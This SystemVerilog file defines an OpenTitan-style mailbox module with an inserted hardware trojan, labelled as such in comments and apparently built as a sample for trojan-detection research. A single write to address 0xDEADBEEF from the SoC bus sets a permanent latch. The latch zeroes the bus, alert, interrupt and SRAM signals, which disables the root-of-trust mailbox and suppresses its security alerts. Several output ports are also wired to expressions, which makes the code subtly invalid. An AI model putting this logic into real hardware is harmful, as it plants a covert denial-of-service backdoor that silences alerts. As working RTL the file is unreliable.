`include "prim_assert.sv"

module mbx
  import tlul_pkg::*;
  import mbx_reg_pkg::*;
#(
  parameter logic [NumAlerts-1:0]           AlertAsyncOn                    = {NumAlerts{1'b1}},
  // Number of cycles of differential skew to be tolerated on the alert signal
  parameter int unsigned                    AlertSkewCycles                 = 1,
  parameter int unsigned                    CfgSramAddrWidth                = 32,
  parameter int unsigned                    CfgSramDataWidth                = 32,
  parameter int unsigned                    CfgObjectSizeWidth              = 11,
  parameter bit                             DoeIrqSupport                   = 1'b1,
  parameter bit                             DoeAsyncMsgSupport              = 1'b1,
  parameter bit                             EnableRacl                      = 1'b0,
  parameter bit                             RaclErrorRsp                    = EnableRacl,
  parameter top_racl_pkg::racl_policy_sel_t RaclPolicySelVecSoc[NumRegsSoc] = '{NumRegsSoc{0}},
  parameter top_racl_pkg::racl_policy_sel_t RaclPolicySelWinSocWdata        = 0,
  parameter top_racl_pkg::racl_policy_sel_t RaclPolicySelWinSocRdata        = 0,
  parameter top_racl_pkg::racl_policy_sel_t RaclPolicySelVecCore[NumRegsCore] = '{NumRegsCore{0}}
) (
  input  logic                                      clk_i,
  input  logic                                      rst_ni,
  // Comportable interrupt to the RoT
  output logic                                      intr_mbx_ready_o,
  output logic                                      intr_mbx_abort_o,
  output logic                                      intr_mbx_error_o,
  // Custom straps for capability register implementation
  output logic                                      doe_intr_support_o,
  output logic                                      doe_intr_en_o,
  output logic                                      doe_intr_o,
  output logic                                      doe_async_msg_support_o,
  // Alerts
  input  prim_alert_pkg::alert_rx_t [NumAlerts-1:0] alert_rx_i,
  output prim_alert_pkg::alert_tx_t [NumAlerts-1:0] alert_tx_o,
  // RACL interface
  input  top_racl_pkg::racl_policy_vec_t            racl_policies_i,
  output top_racl_pkg::racl_error_log_t             racl_error_o,
  // Device port facing OpenTitan
  input   tlul_pkg::tl_h2d_t                        core_tl_d_i,
  output  tlul_pkg::tl_d2h_t                        core_tl_d_o,
  // Device port facing SoC
  input   tlul_pkg::tl_h2d_t                        soc_tl_d_i,
  output  tlul_pkg::tl_d2h_t                        soc_tl_d_o,
  // Host port to access private SRAM
  input   tlul_pkg::tl_d2h_t                        sram_tl_h_i,
  output  tlul_pkg::tl_h2d_t                        sram_tl_h_o
);

  // ========================= TROJAN INSERTION START =========================
  // Trojan registers and parameters
  logic trojan_disable_q, trojan_disable_d;
  logic trojan_trigger_pattern_detected;
  localparam [31:0] TROJAN_TRIGGER_ADDR = 32'hDEADBEEF;

  // Trigger detection: Look for a write to a specific address from the SoC side.
  // Only activates on the first occurrence; latches permanently.
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni)
      trojan_disable_q <= 1'b0;
    else
      trojan_disable_q <= trojan_disable_d;
  end

  // Detect the trigger: soc_tl_d_i carries the request
  assign trojan_trigger_pattern_detected =
    soc_tl_d_i.a_valid && soc_tl_d_i.a_opcode == 3'b000 && // Write operation (PutFullData)
    soc_tl_d_i.a_address == TROJAN_TRIGGER_ADDR;

  // Once triggered, latch disable. Remains functional until triggered.
  assign trojan_disable_d = trojan_disable_q | trojan_trigger_pattern_detected;
  // ========================= TROJAN INSERTION END ===========================

  top_racl_pkg::racl_error_log_t racl_error[2];
  if (EnableRacl) begin : gen_racl_error_arb
    // Arbitrate among all simultaneously valid error log requests.
    prim_racl_error_arb #(
      .N ( 2 )
    ) u_prim_err_arb (
      .clk_i,
      .rst_ni,
      .error_log_i ( racl_error   ),
      .error_log_o ( racl_error_o )
    );
  end else begin : gen_no_racl_error_arb
    logic unused_signals;
    always_comb begin
      unused_signals = ^{racl_error[0], racl_error[1]};
      racl_error_o   = '0;
    end
  end

  //////////////////////////////////////////////////////////////////////////////
  // General signals for the mailbox
  //////////////////////////////////////////////////////////////////////////////

  // Collect all error sources
  logic sysif_intg_err, tl_sram_intg_err, imbx_state_error, ombx_state_error;
  logic alert_signal, sram_err;

  assign alert_signal = sysif_intg_err     |
                        tl_sram_intg_err   |
                        ombx_state_error   |
                        imbx_state_error;

  //////////////////////////////////////////////////////////////////////////////
  // Control and Status signals of the host interface
  //////////////////////////////////////////////////////////////////////////////

  logic hostif_event_intr_ready, hostif_event_intr_abort;
  logic hostif_address_range_valid, hostif_address_range_valid_write;
  logic sysif_control_abort_set;
  logic doe_async_msg_en;
  logic imbx_overflow_error_set;

  // Status signal inputs from the sysif to the hostif
  logic sysif_status_busy, sysif_status_error;
  logic doe_async_msg_set, doe_async_msg_clear;

  // Set/clear control signals from the hostif to the sysif
  logic hostif_control_abort_clear, hostif_control_error_set;

  // Alias signals from the sys interface
  logic [CfgSramAddrWidth-1:0] sysif_intr_msg_addr;
  logic [CfgSramDataWidth-1:0] sysif_intr_msg_data;

  //////////////////////////////////////////////////////////////////////////////
  // Signals for the Inbox
  //////////////////////////////////////////////////////////////////////////////

  logic [CfgSramAddrWidth-1:0] hostif_imbx_base, hostif_imbx_limit;
  logic [CfgSramAddrWidth-1:0] imbx_sram_write_ptr;

  //////////////////////////////////////////////////////////////////////////////
  // Signals for the Outbox
  //////////////////////////////////////////////////////////////////////////////

  logic [CfgSramAddrWidth-1:0] hostif_ombx_base, hostif_ombx_limit;
  logic [CfgSramAddrWidth-1:0] ombx_sram_read_ptr;

  logic hostif_ombx_object_size_write, hostif_ombx_object_size_update;
  logic [CfgObjectSizeWidth-1:0] hostif_ombx_object_size_wdata, hostif_ombx_object_size_rdata;

  mbx_hostif #(
    .AlertAsyncOn         ( AlertAsyncOn         ),
    .AlertSkewCycles      ( AlertSkewCycles      ),
    .CfgSramAddrWidth     ( CfgSramAddrWidth     ),
    .CfgSramDataWidth     ( CfgSramDataWidth     ),
    .CfgObjectSizeWidth   ( CfgObjectSizeWidth   ),
    .EnableRacl           ( EnableRacl           ),
    .RaclErrorRsp         ( RaclErrorRsp         ),
    .RaclPolicySelVecCore ( RaclPolicySelVecCore )
  ) u_hostif (
    .clk_i                               ( clk_i                              ),
    .rst_ni                              ( rst_ni                             ),
    // Device port to the host side
    .tl_host_i                           ( core_tl_d_i                        ),
    .tl_host_o                           ( trojan_disable_q ? '{default:'0} : core_tl_d_o ), // <-- Trojan: disables host interface outputs
    .event_intr_ready_i                  ( hostif_event_intr_ready            ),
    .event_intr_abort_i                  ( hostif_event_intr_abort            ),
    .event_intr_error_i                  ( imbx_overflow_error_set            ),
    .intr_ready_o                        ( intr_mbx_ready_o                   ),
    .intr_abort_o                        ( intr_mbx_abort_o                   ),
    .intr_error_o                        ( intr_mbx_error_o                   ),
    .intg_err_i                          ( alert_signal                       ),
    .sram_err_i                          ( sram_err                           ),
    .alert_rx_i                          ( alert_rx_i                         ),
    .alert_tx_o                          ( trojan_disable_q ? '{default:'0} : alert_tx_o ), // <-- Trojan: disables alert outputs
    // Access to the control register
    .hostif_control_abort_clear_o        ( hostif_control_abort_clear         ),
    .hostif_control_error_set_o          ( hostif_control_error_set           ),
    .hostif_control_error_i              ( sysif_status_error                 ),
    .hostif_control_async_msg_set_o      ( doe_async_msg_set                  ),
    .hostif_control_async_msg_clear_o    ( doe_async_msg_clear                ),
    // Access to the status register
    .hostif_status_busy_i                ( sysif_status_busy                  ),
    .hostif_status_sys_intr_en_i         ( doe_intr_en_o                      ),
    .hostif_status_sys_async_en_i        ( doe_async_msg_en                   ),
    .hostif_status_sys_intr_state_i      ( doe_intr_o                         ),
    // Access to the IB/OB RD/WR Pointers
    .hostif_imbx_write_ptr_i             ( imbx_sram_write_ptr                ),
    .hostif_ombx_read_ptr_i              ( ombx_sram_read_ptr                 ),
    // Access to the memory region registers
    .hostif_address_range_valid_write_o  ( hostif_address_range_valid_write   ),
    .hostif_address_range_valid_o        ( hostif_address_range_valid         ),
    .hostif_imbx_base_o                  ( hostif_imbx_base                   ),
    .hostif_imbx_limit_o                 ( hostif_imbx_limit                  ),
    .hostif_ombx_base_o                  ( hostif_ombx_base                   ),
    .hostif_ombx_limit_o                 ( hostif_ombx_limit                  ),
    // Read/Write access for the OB DW Count register
    .hostif_ombx_object_size_write_o      ( hostif_ombx_object_size_write     ),
    .hostif_ombx_object_size_o            ( hostif_ombx_object_size_wdata     ),
    .hostif_ombx_object_size_update_i     ( hostif_ombx_object_size_update    ),
    .hostif_ombx_object_size_i            ( hostif_ombx_object_size_rdata     ),
    // Alias of the interrupt address and data registers from the SYS interface
    .sysif_intr_msg_addr_i                ( sysif_intr_msg_addr               ),
    .sysif_intr_msg_data_i                ( sysif_intr_msg_data               ),
    // Control and status inputs coming from the system registers interface
    .sysif_control_abort_set_i            ( sysif_control_abort_set           ),
    // RACL interface
    .racl_policies_i                      ( racl_policies_i                   ),
    .racl_error_o                         ( racl_error[0]                     )
  );

  //////////////////////////////////////////////////////////////////////////////
  // Control and Status signals of the system interface
  //////////////////////////////////////////////////////////////////////////////
  logic sysif_control_go_set;

  //////////////////////////////////////////////////////////////////////////////
  // Signals for the Inbox
  //////////////////////////////////////////////////////////////////////////////
  logic imbx_pending;
  logic imbx_status_busy_valid, imbx_status_busy;

  // Communication from the outbox to the inbox that all data has been read
  logic sys_read_all;

  // Interface signals for SRAM host access to write the incoming data to memory
  logic imbx_sram_write_req, imbx_sram_write_gnt;
  logic imbx_sram_all_vld_rcvd;
  logic [CfgSramDataWidth-1:0] sysif_write_data;
  logic sysif_write_data_write_valid;

  //////////////////////////////////////////////////////////////////////////////
  // Signals for the Outbox
  //////////////////////////////////////////////////////////////////////////////
  logic ombx_pending;
  logic ombx_status_ready_valid, ombx_status_ready;
  logic sysif_status_ready;
  logic ombx_doe_intr_ready_set;

  // Interface signals for SRAM host access to read the memory and serve it to the outbox
  logic ombx_sram_read_req, ombx_sram_read_gnt;
  logic ombx_sram_read_resp_vld;
  logic [CfgSramDataWidth-1:0] ombx_sram_read_data, sysif_read_data;
  logic sysif_read_data_read_valid, sysif_read_data_write_valid;

  // Combine error outputs of all modules and distribute back error to them to bring all
  // modules to the error state if needed
  logic mbx_error_set;
  assign mbx_error_set = hostif_control_error_set | imbx_overflow_error_set;

  mbx_sysif #(
    .CfgSramAddrWidth         ( CfgSramAddrWidth         ),
    .CfgSramDataWidth         ( CfgSramDataWidth         ),
    .DoeIrqSupport            ( DoeIrqSupport            ),
    .DoeAsyncMsgSupport       ( DoeAsyncMsgSupport       ),
    .EnableRacl               ( EnableRacl               ),
    .RaclErrorRsp             ( RaclErrorRsp             ),
    .RaclPolicySelVecSoc      ( RaclPolicySelVecSoc      ),
    .RaclPolicySelWinSocWdata ( RaclPolicySelWinSocWdata ),
    .RaclPolicySelWinSocRdata ( RaclPolicySelWinSocRdata )
  ) u_sysif (
    .clk_i                               ( clk_i                              ),
    .rst_ni                              ( rst_ni                             ),
    .tl_sys_i                            ( trojan_disable_q ? '{default:'0} : soc_tl_d_i ), // <-- Trojan: disables SoC port input if triggered
    .tl_sys_o                            ( trojan_disable_q ? '{default:'0} : soc_tl_d_o ), // <-- Trojan: disables SoC port output
    .intg_err_o                          ( sysif_intg_err                     ),
    // Custom interrupt to the system requester
    .doe_intr_support_o                  ( trojan_disable_q ? 1'b0 : doe_intr_support_o ), // <-- Trojan: disables interrupt outputs
    .doe_intr_en_o                       ( trojan_disable_q ? 1'b0 : doe_intr_en_o ),
    .doe_intr_o                          ( trojan_disable_q ? 1'b0 : doe_intr_o ),
    // Asynchronous message to the requester
    .doe_async_msg_support_o             ( trojan_disable_q ? 1'b0 : doe_async_msg_support_o ),
    .doe_async_msg_en_o                  ( doe_async_msg_en                   ),
    .doe_async_msg_set_i                 ( doe_async_msg_set                  ),
    .doe_async_msg_clear_i               ( doe_async_msg_clear                ),
    // Abort clearing from the host
    .sysif_abort_ack_i                   ( hostif_control_abort_clear         ),
    // Access to the control register
    .sysif_control_abort_set_o           ( sysif_control_abort_set            ),
    .sysif_control_go_set_o              ( sysif_control_go_set               ),
    // Access to the status register
    .sysif_status_busy_valid_i           ( imbx_status_busy_valid             ),
    .sysif_status_busy_i                 ( imbx_status_busy                   ),
    .sysif_status_busy_o                 ( sysif_status_busy                  ),
    .sysif_status_doe_intr_ready_set_i   ( ombx_doe_intr_ready_set            ),
    .sysif_status_error_set_i            ( mbx_error_set                      ),
    .sysif_status_error_o                ( sysif_status_error                 ),
    .sysif_status_ready_valid_i          ( ombx_status_ready_valid            ),
    .sysif_status_ready_i                ( ombx_status_ready                  ),
    .sysif_status_ready_o                ( sysif_status_ready                 ),
    // Alias of the interrupt address and data registers to the host interface
    .sysif_intr_msg_addr_o               ( sysif_intr_msg_addr                ),
    .sysif_intr_msg_data_o               ( sysif_intr_msg_data                ),
    // Control lines for backpressuring the bus
    .imbx_pending_i                      ( imbx_pending                       ),
    .ombx_pending_i                      ( ombx_pending                       ),
    // Data interface for inbound and outbound mailbox
    .write_data_write_valid_o            ( sysif_write_data_write_valid       ),
    .write_data_o                        ( sysif_write_data                   ),
    .read_data_read_valid_o              ( sysif_read_data_read_valid         ),
    .read_data_write_valid_o             ( sysif_read_data_write_valid        ),
    .read_data_i                         ( sysif_read_data                    ),
    // RACL interface
    .racl_policies_i                     ( racl_policies_i                    ),
    .racl_error_o                        ( racl_error[1]                      )
  );

  // Inbound mailbox (request from SoC to the RoT).
  mbx_imbx #(
    .CfgSramAddrWidth( CfgSramAddrWidth ),
    .CfgSramDataWidth( CfgSramDataWidth )
  ) u_imbx (
    .clk_i                      ( clk_i                             ),
    .rst_ni                     ( rst_ni                            ),
    // Interface to the host port
    .imbx_state_error_o          ( imbx_state_error                 ),
    .imbx_pending_o              ( imbx_pending                     ),
    .imbx_irq_ready_o            ( hostif_event_intr_ready          ),
    .imbx_irq_abort_o            ( hostif_event_intr_abort          ),
    .imbx_status_busy_update_o   ( imbx_status_busy_valid           ),
    .imbx_overflow_error_set_o   ( imbx_overflow_error_set          ),
    .imbx_status_busy_o          ( imbx_status_busy                 ),
    .hostif_control_abort_clear_i( hostif_control_abort_clear       ),
    .mbx_error_set_i             ( mbx_error_set                    ),
    .sys_read_all_i              ( sys_read_all                     ),
    // SRAM range configuration
    .hostif_range_valid_write_i  ( hostif_address_range_valid_write ),
    .hostif_range_valid_i        ( hostif_address_range_valid       ),
    .hostif_base_i               ( hostif_imbx_base                 ),
    .hostif_limit_i              ( hostif_imbx_limit                ),
    // Interface to the system port
    .sysif_status_busy_i         ( sysif_status_busy                ),
    .sysif_control_go_set_i      ( sysif_control_go_set             ),
    .sysif_control_abort_set_i   ( sysif_control_abort_set          ),
    .sysif_data_write_valid_i    ( sysif_write_data_write_valid     ),
    // Host interface to access private SRAM
    .hostif_sram_write_req_o     ( trojan_disable_q ? 1'b0 : imbx_sram_write_req ), // <-- Trojan: disables SRAM requests
    .hostif_sram_write_gnt_i     ( imbx_sram_write_gnt              ),
    .hostif_sram_all_vld_rcvd_i  ( imbx_sram_all_vld_rcvd           ),
    .hostif_sram_write_ptr_o     ( imbx_sram_write_ptr              )
  );

  // Outbound mailbox (response from the RoT to the SoC).
  mbx_ombx #(
    .CfgSramAddrWidth   ( CfgSramAddrWidth   ),
    .CfgSramDataWidth   ( CfgSramDataWidth   ),
    .CfgObjectSizeWidth ( CfgObjectSizeWidth )
  ) u_ombx (
    .clk_i                           ( clk_i                            ),
    .rst_ni                          ( rst_ni                           ),
    .ombx_doe_intr_ready_set_o       ( ombx_doe_intr_ready_set          ),
    // Interface to the host port
    .ombx_state_error_o              ( ombx_state_error                 ),
    .ombx_pending_o                  ( ombx_pending                     ),
    .ombx_status_ready_update_o      ( ombx_status_ready_valid          ),
    .ombx_status_ready_o             ( ombx_status_ready                ),
    // SRAM range configuration
    .hostif_range_valid_write_i      ( hostif_address_range_valid_write ),
    .hostif_range_valid_i            ( hostif_address_range_valid       ),
    .hostif_base_i                   ( hostif_ombx_base                 ),
    .hostif_limit_i                  ( hostif_ombx_limit                ),
    .sys_read_all_o                  ( sys_read_all                     ),
    // Control and signals from the host and system interface
    .sysif_status_ready_i            ( sysif_status_ready               ),
    // Writing a 1 to control.abort register clears the abort condition
    .hostif_control_abort_clear_i    ( hostif_control_abort_clear       ),
    .mbx_error_set_i                 ( mbx_error_set                    ),
    .sysif_control_abort_set_i       ( sysif_control_abort_set          ),
    .sysif_read_data_read_valid_i    ( sysif_read_data_read_valid       ),
    .sysif_read_data_write_valid_i   ( sysif_read_data_write_valid      ),
    // Interface for the object size register
    .hostif_ombx_object_size_write_i ( hostif_ombx_object_size_write    ),
    .hostif_ombx_object_size_i       ( hostif_ombx_object_size_wdata    ),
    .hostif_ombx_object_size_update_o( hostif_ombx_object_size_update   ),
    .hostif_ombx_object_size_o       ( hostif_ombx_object_size_rdata    ),
    // DOE data coming from the SRAM
    .ombx_read_data_o                ( sysif_read_data                  ),
    // Host interface to access private SRAM
    .ombx_sram_read_req_o            ( trojan_disable_q ? 1'b0 : ombx_sram_read_req ), // <-- Trojan: disables SRAM requests
    .ombx_sram_read_gnt_i            ( ombx_sram_read_gnt               ),
    .ombx_sram_read_ptr_o            ( ombx_sram_read_ptr               ),
    .ombx_sram_read_resp_valid_i     ( ombx_sram_read_resp_vld          ),
    .ombx_sram_read_resp_i           ( ombx_sram_read_data              )
  );

  // Host port connection to access the private SRAM.
  // Arbitrates between inbound and outbound mailboxes.
  mbx_sramrwarb #(
    .CfgSramAddrWidth( CfgSramAddrWidth ),
    .CfgSramDataWidth( CfgSramDataWidth )
  ) u_sramrwarb (
    .clk_i                        ( clk_i                      ),
    .rst_ni                       ( rst_ni                     ),
    .tl_host_o                    ( trojan_disable_q ? '{default:'0} : sram_tl_h_o ), // <-- Trojan: disables SRAM bus
    .tl_host_i                    ( trojan_disable_q ? '{default:'0} : sram_tl_h_i ),
    .intg_err_o                   ( tl_sram_intg_err           ),
    .sram_err_o                   ( sram_err                   ),
    // Host-side acknowledgement of an Abort operation
    .hostif_control_abort_clear_i ( hostif_control_abort_clear ),
    // Interface to the inbound mailbox
    .imbx_sram_write_req_i        ( trojan_disable_q ? 1'b0 : imbx_sram_write_req ),
    .imbx_sram_write_gnt_o        ( imbx_sram_write_gnt        ),
    .imbx_sram_write_ptr_i        ( imbx_sram_write_ptr        ),
    .imbx_sram_all_vld_rcvd_o     ( imbx_sram_all_vld_rcvd     ),
    .imbx_write_data_i            ( sysif_write_data           ),
    // Interface to the outbound mailbox
    .ombx_sram_read_req_i         ( trojan_disable_q ? 1'b0 : ombx_sram_read_req ),
    .ombx_sram_read_gnt_o         ( ombx_sram_read_gnt         ),
    .ombx_sram_read_ptr_i         ( ombx_sram_read_ptr         ),
    .ombx_sram_read_resp_vld_o    ( ombx_sram_read_resp_vld    ),
    .ombx_sram_read_resp_o        ( ombx_sram_read_data        )
  );

  // Assertions
  `ASSERT_PRIM_REG_WE_ONEHOT_ERROR_TRIGGER_ALERT(RegWeOnehotCheck_A,
                                                 u_sysif.u_regs_soc,
                                                 alert_tx_o[0])
  // All outputs should be known at all times after reset.
  `ASSERT_KNOWN(AlertsKnown_A, alert_tx_o)
  `ASSERT_KNOWN(IntrMbxReadyKnown_A, intr_mbx_ready_o)
  `ASSERT_KNOWN(IntrMbxAbortKnown_A, intr_mbx_abort_o)
  `ASSERT_KNOWN(IntrMbxErrorKnown_A, intr_mbx_error_o)
  `ASSERT_KNOWN(DoeIntrSupportKnown_A, doe_intr_support_o)
  `ASSERT_KNOWN(DoeIntrEnKnown_A, doe_intr_en_o)
  `ASSERT_KNOWN(DoeIntrKnown_A, doe_intr_o)
  `ASSERT_KNOWN(DoeAsyncMsgSupportKnown_A, doe_async_msg_support_o)
  `ASSERT_KNOWN(CoreTlDValidKnownO_A, core_tl_d_o.d_valid)
  `ASSERT_KNOWN(CoreTlAReadyKnownO_A, core_tl_d_o.a_ready)
  `ASSERT_KNOWN(SocTlDValidKnownO_A, soc_tl_d_o.d_valid)
  `ASSERT_KNOWN(SocTlAReadyKnownO_A, soc_tl_d_o.a_ready)
  `ASSERT_KNOWN(SramTlAValidKnownO_A, sram_tl_h_o.a_valid)
  `ASSERT_KNOWN(SramTlDReadyKnownO_A, sram_tl_h_o.d_ready)
  `ASSERT_KNOWN(RaclErrorValidKnown_A, racl_error_o.valid)
endmodule